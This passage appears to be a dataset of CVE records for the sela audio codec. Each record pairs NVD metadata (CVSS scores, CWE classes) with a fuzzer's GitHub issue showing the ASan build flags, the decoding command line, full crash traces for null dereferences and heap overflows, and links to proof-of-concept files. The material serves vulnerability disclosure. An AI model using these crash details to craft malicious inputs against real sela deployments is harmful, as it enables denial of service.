/home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:779 in __interceptor_memcpy.part.37 Shadow bytes around the buggy address: 0x0c4a8028afd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a8028afe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a8028aff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a8028b000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a8028b010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c4a8028b020:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a8028b030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a8028b040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a8028b050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a8028b060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4a8028b070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==42335==ABORTING ``` ## POC [heap-overflow-writeToFile-wav_file-262.zip](https://github.com/sahaRatul/sela/files/5072659/heap-overflow-writeToFile-wav_file-262.zip)
A heap-buffer-overflow in wav_file.cpp:262:32
https://api.github.com/repos/sahaRatul/sela/issues/25/comments
0
2020-08-14T04:52:18Z
2020-08-14T04:52:18Z
https://github.com/sahaRatul/sela/issues/25
678,895,603
25
2,555
CVE-2021-39545
2021-09-20T16:15:12.827
An issue was discovered in sela through 20200412. A NULL pointer dereference exists in the function rice::RiceDecoder::process() located in rice_decoder.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/31" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/31" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sela_project:sela:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EFCB451-9AB9-4111-B4C8-3F9283520F9C", "versionEndExcluding": null, "versionEndIncluding": "2020-04-12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/sahaRatul/sela/issues/31
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sahaRatul", "sela" ]
## System info Ubuntu x86_64, clang 6.0, sela (latest master [ca09cb](https://github.com/sahaRatul/sela/commit/ca09cbd80bd6084bca08288d980c7f6928571bbb)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/sela -d @@ /dev/null ## AddressSanitizer output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==49008==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000053a89f bp 0x7f1e280af1d0 sp 0x7f1e280af0c0 T80) ==49008==The signal is caused by a READ memory access. ==49008==Hint: address points to the zero page. #0 0x53a89e in rice::RiceDecoder::generateDecodedUnsignedInts() /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_bvector.h #1 0x53a05b in rice::RiceDecoder::process() /home/seviezhou/sela/src/rice/rice_decoder.cpp:58:5 #2 0x541287 in frame::FrameDecoder::process() /home/seviezhou/sela/src/frame/frame_decoder.cpp:28:93 #3 0x56e3fe in sela::LoopThrough::process(std::vector<data::WavFrame, std::allocator<data::WavFrame> >&) /home/seviezhou/sela/src/sela/decoder.cpp:30:47 #4 0x7f1e5342fb0f (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0xd0b0f) #5 0x7f1e52e406b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9) #6 0x7f1e525524dc in clone /build/glibc-e6zv40/glibc-2.23/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:109 AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_bvector.h in rice::RiceDecoder::generateDecodedUnsignedInts() Thread T80 created by T0 here: #0 0x434b8d in pthread_create /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_interceptors.cc:204 #1 0x7f1e5342fda4 in std::thread::_M_start_thread(std::unique_ptr<std::thread::_State, std::default_delete<std::thread::_State> >, void (*)()) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0xd0da4) #2 0x56c1ea in sela::Decoder::processFrames(std::vector<data::WavFrame, std::allocator<data::WavFrame> >&) /home/seviezhou/sela/src/sela/decoder.cpp:68:34 #3 0x56d73b in sela::Decoder::process() /home/seviezhou/sela/src/sela/decoder.cpp:98:5 #4 0x51dbe8 in decodeFile(std::basic_ifstream<char, std::char_traits<char> >&, std::basic_ofstream<char, std::char_traits<char> >&) /home/seviezhou/sela/src/main.cpp:39:37 #5 0x51f553 in main /home/seviezhou/sela/src/main.cpp:85:17 #6 0x7f1e5246b83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 ==49008==ABORTING ``` ## POC [SEGV-process-rice_decoder-58.zip](https://github.com/sahaRatul/sela/files/5072688/SEGV-process-rice_decoder-58.zip)
Segmentation fault in rice_decoder.cpp:58:5
https://api.github.com/repos/sahaRatul/sela/issues/31/comments
0
2020-08-14T05:04:52Z
2020-08-14T05:04:52Z
https://github.com/sahaRatul/sela/issues/31
678,900,221
31
2,556
CVE-2021-39546
2021-09-20T16:15:12.873
An issue was discovered in sela through 20200412. rice::RiceDecoder::process() in rice_decoder.cpp has a heap-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/29" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/29" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sela_project:sela:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EFCB451-9AB9-4111-B4C8-3F9283520F9C", "versionEndExcluding": null, "versionEndIncluding": "2020-04-12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/sahaRatul/sela/issues/29
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sahaRatul", "sela" ]
## System info Ubuntu x86_64, clang 6.0, sela (latest master [ca09cb](https://github.com/sahaRatul/sela/commit/ca09cbd80bd6084bca08288d980c7f6928571bbb)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/sela -d @@ /dev/null ## AddressSanitizer output ``` ================================================================= ==28346==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001058 at pc 0x00000053ad8d bp 0x7f61d7aaf0b0 sp 0x7f61d7aaf0a8 READ of size 8 at 0x602000001058 thread T80 #0 0x53ad8c in std::_Bit_reference::operator bool() const /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_bvector.h:83:17 #1 0x53ad8c in rice::RiceDecoder::generateDecodedUnsignedInts() /home/seviezhou/sela/src/rice/rice_decoder.cpp:39 #2 0x53a05b in rice::RiceDecoder::process() /home/seviezhou/sela/src/rice/rice_decoder.cpp:58:5 #3 0x541287 in frame::FrameDecoder::process() /home/seviezhou/sela/src/frame/frame_decoder.cpp:28:93 #4 0x56e3fe in sela::LoopThrough::process(std::vector<data::WavFrame, std::allocator<data::WavFrame> >&) /home/seviezhou/sela/src/sela/decoder.cpp:30:47 #5 0x7f6202d78b0f (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0xd0b0f) #6 0x7f62027896b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9) #7 0x7f6201e9b4dc in clone /build/glibc-e6zv40/glibc-2.23/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:109 0x602000001058 is located 0 bytes to the right of 8-byte region [0x602000001050,0x602000001058) allocated by thread T80 here: #0 0x518278 in operator new(unsigned long) /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_new_delete.cc:92 #1 0x534dcd in __gnu_cxx::new_allocator<unsigned long>::allocate(unsigned long, void const*) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/ext/new_allocator.h:111:27 #2 0x534dcd in std::allocator_traits<std::allocator<unsigned long> >::allocate(std::allocator<unsigned long>&, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/alloc_traits.h:436 #3 0x534dcd in std::_Bvector_base<std::allocator<bool> >::_M_allocate(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_bvector.h:530 #4 0x534dcd in std::vector<bool, std::allocator<bool> >::_M_reallocate(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/vector.tcc:764 #5 0x534560 in std::vector<bool, std::allocator<bool> >::reserve(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_bvector.h:921:4 Thread T80 created by T0 here: #0 0x434b8d in pthread_create /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_interceptors.cc:204 #1 0x7f6202d78da4 in std::thread::_M_start_thread(std::unique_ptr<std::thread::_State, std::default_delete<std::thread::_State> >, void (*)()) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0xd0da4) #2 0x56c1ea in sela::Decoder::processFrames(std::vector<data::WavFrame, std::allocator<data::WavFrame> >&) /home/seviezhou/sela/src/sela/decoder.cpp:68:34 #3 0x56d73b in sela::Decoder::process() /home/seviezhou/sela/src/sela/decoder.cpp:98:5 #4 0x51dbe8 in decodeFile(std::basic_ifstream<char, std::char_traits<char> >&, std::basic_ofstream<char, std::char_traits<char> >&) /home/seviezhou/sela/src/main.cpp:39:37 #5 0x51f553 in main /home/seviezhou/sela/src/main.cpp:85:17 #6 0x7f6201db483f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_bvector.h:83:17 in std::_Bit_reference::operator bool() const Shadow bytes around the buggy address: 0x0c047fff81b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff81c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff81d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff81e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff81f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c047fff8200: fa fa 04 fa fa fa 04 fa fa fa 00[fa]fa fa 00 fa 0x0c047fff8210: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8220: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==28346==ABORTING ``` ## POC [heap-overflow-generateDecodedUnsignedInts-rice_decoder-39.zip](https://github.com/sahaRatul/sela/files/5072676/heap-overflow-generateDecodedUnsignedInts-rice_decoder-39.zip)
A heap-buffer-overflow in rice_decoder.cpp:39
https://api.github.com/repos/sahaRatul/sela/issues/29/comments
0
2020-08-14T05:00:32Z
2020-08-14T05:00:32Z
https://github.com/sahaRatul/sela/issues/29
678,898,461
29
2,557
CVE-2021-39547
2021-09-20T16:15:12.917
An issue was discovered in sela through 20200412. A NULL pointer dereference exists in the function lpc::SampleGenerator::process() located in sample_generator.cpp. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/32" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/32" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sela_project:sela:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EFCB451-9AB9-4111-B4C8-3F9283520F9C", "versionEndExcluding": null, "versionEndIncluding": "2020-04-12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/sahaRatul/sela/issues/32
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sahaRatul", "sela" ]
## System info Ubuntu x86_64, clang 6.0, sela (latest master [ca09cb](https://github.com/sahaRatul/sela/commit/ca09cbd80bd6084bca08288d980c7f6928571bbb)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/sela -d @@ /dev/null ## AddressSanitizer output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==11955==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000052ebd6 bp 0x7f26af4af2b0 sp 0x7f26af4af130 T80) ==11955==The signal is caused by a READ memory access. ==11955==Hint: address points to the zero page. #0 0x52ebd5 in lpc::SampleGenerator::generateSamples(std::vector<int, std::allocator<int> >&) /home/seviezhou/sela/src/lpc/sample_generator.cpp:15:18 #1 0x52e78d in lpc::SampleGenerator::process() /home/seviezhou/sela/src/lpc/sample_generator.cpp:37:5 #2 0x541468 in frame::FrameDecoder::process() /home/seviezhou/sela/src/frame/frame_decoder.cpp:34:84 #3 0x56e3fe in sela::LoopThrough::process(std::vector<data::WavFrame, std::allocator<data::WavFrame> >&) /home/seviezhou/sela/src/sela/decoder.cpp:30:47 #4 0x7f26da7beb0f (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0xd0b0f) #5 0x7f26da1cf6b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9) #6 0x7f26d98e14dc in clone /build/glibc-e6zv40/glibc-2.23/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:109 AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/sela/src/lpc/sample_generator.cpp:15:18 in lpc::SampleGenerator::generateSamples(std::vector<int, std::allocator<int> >&) Thread T80 created by T0 here: #0 0x434b8d in pthread_create /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_interceptors.cc:204 #1 0x7f26da7beda4 in std::thread::_M_start_thread(std::unique_ptr<std::thread::_State, std::default_delete<std::thread::_State> >, void (*)()) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0xd0da4) #2 0x56c1ea in sela::Decoder::processFrames(std::vector<data::WavFrame, std::allocator<data::WavFrame> >&) /home/seviezhou/sela/src/sela/decoder.cpp:68:34 #3 0x56d73b in sela::Decoder::process() /home/seviezhou/sela/src/sela/decoder.cpp:98:5 #4 0x51dbe8 in decodeFile(std::basic_ifstream<char, std::char_traits<char> >&, std::basic_ofstream<char, std::char_traits<char> >&) /home/seviezhou/sela/src/main.cpp:39:37 #5 0x51f553 in main /home/seviezhou/sela/src/main.cpp:85:17 #6 0x7f26d97fa83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 ==11955==ABORTING ``` ## POC [SEGV-generateSamples-sample_generator-15.zip](https://github.com/sahaRatul/sela/files/5072693/SEGV-generateSamples-sample_generator-15.zip)
Segmentation fault in sample_generator.cpp:15:18
https://api.github.com/repos/sahaRatul/sela/issues/32/comments
0
2020-08-14T05:06:36Z
2020-08-14T05:06:36Z
https://github.com/sahaRatul/sela/issues/32
678,900,888
32
2,558
CVE-2021-39548
2021-09-20T16:15:12.963
An issue was discovered in sela through 20200412. A NULL pointer dereference exists in the function frame::FrameDecoder::process() located in frame_decoder.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/28" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/28" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sela_project:sela:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EFCB451-9AB9-4111-B4C8-3F9283520F9C", "versionEndExcluding": null, "versionEndIncluding": "2020-04-12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/sahaRatul/sela/issues/28
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sahaRatul", "sela" ]
## System info Ubuntu x86_64, clang 6.0, sela (latest master [ca09cb](https://github.com/sahaRatul/sela/commit/ca09cbd80bd6084bca08288d980c7f6928571bbb)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/sela -d @@ /dev/null ## AddressSanitizer output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==41926==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000005422ce bp 0x7fc345bafcb0 sp 0x7fc345baf2c0 T80) ==41926==The signal is caused by a READ memory access. ==41926==Hint: address points to the zero page. #0 0x5422cd in frame::FrameDecoder::process() /home/seviezhou/sela/src/frame/frame_decoder.cpp:65:35 #1 0x56e3fe in sela::LoopThrough::process(std::vector<data::WavFrame, std::allocator<data::WavFrame> >&) /home/seviezhou/sela/src/sela/decoder.cpp:30:47 #2 0x7fc370e9bb0f (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0xd0b0f) #3 0x7fc3708ac6b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9) #4 0x7fc36ffbe4dc in clone /build/glibc-e6zv40/glibc-2.23/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:109 AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/seviezhou/sela/src/frame/frame_decoder.cpp:65:35 in frame::FrameDecoder::process() Thread T80 created by T0 here: #0 0x434b8d in pthread_create /home/seviezhou/llvm-6.0.0/projects/compiler-rt/lib/asan/asan_interceptors.cc:204 #1 0x7fc370e9bda4 in std::thread::_M_start_thread(std::unique_ptr<std::thread::_State, std::default_delete<std::thread::_State> >, void (*)()) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0xd0da4) #2 0x56c1ea in sela::Decoder::processFrames(std::vector<data::WavFrame, std::allocator<data::WavFrame> >&) /home/seviezhou/sela/src/sela/decoder.cpp:68:34 #3 0x56d73b in sela::Decoder::process() /home/seviezhou/sela/src/sela/decoder.cpp:98:5 #4 0x51dbe8 in decodeFile(std::basic_ifstream<char, std::char_traits<char> >&, std::basic_ofstream<char, std::char_traits<char> >&) /home/seviezhou/sela/src/main.cpp:39:37 #5 0x51f553 in main /home/seviezhou/sela/src/main.cpp:85:17 #6 0x7fc36fed783f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 ==41926==ABORTING ``` ## POC [SEGV-process-frame_decoder-65.zip](https://github.com/sahaRatul/sela/files/5072672/SEGV-process-frame_decoder-65.zip)
Segmentation fault in frame_decoder.cpp:65:35
https://api.github.com/repos/sahaRatul/sela/issues/28/comments
0
2020-08-14T04:58:45Z
2020-08-14T04:58:45Z
https://github.com/sahaRatul/sela/issues/28
678,897,858
28
2,559
CVE-2021-39549
2021-09-20T16:15:13.007
An issue was discovered in sela through 20200412. A NULL pointer dereference exists in the function file::WavFile::WavFile() located in wav_file.c. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/27" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sahaRatul/sela/issues/27" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sela_project:sela:*:*:*:*:*:*:*:*", "matchCriteriaId": "9EFCB451-9AB9-4111-B4C8-3F9283520F9C", "versionEndExcluding": null, "versionEndIncluding": "2020-04-12", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/sahaRatul/sela/issues/27
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sahaRatul", "sela" ]
## System info Ubuntu x86_64, clang 6.0, sela (latest master [ca09cb](https://github.com/sahaRatul/sela/commit/ca09cbd80bd6084bca08288d980c7f6928571bbb)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/sela -d @@ /dev/null ## AddressSanitizer output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==74467==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x00000054f6ca bp 0x7ffd122617f0 sp 0x7ffd122616a0 T0) ==74467==The signal is caused by a READ memory access. ==74467==Hint: address points to the zero page. #0 0x54f6c9 in file::WavFile::WavFile(unsigned int, unsigned short, unsigned short, std::vector<data::WavFrame, std::allocator<data::WavFrame> >&&) /home/seviezhou/sela/src/file/wav_file.cpp:13:46 #1 0x56d7da in sela::Decoder::process() /home/seviezhou/sela/src/sela/decoder.cpp:99:12 #2 0x51dbe8 in decodeFile(std::basic_ifstream<char, std::char_traits<char> >&, std::basic_ofstream<char, std::char_traits<char> >&) 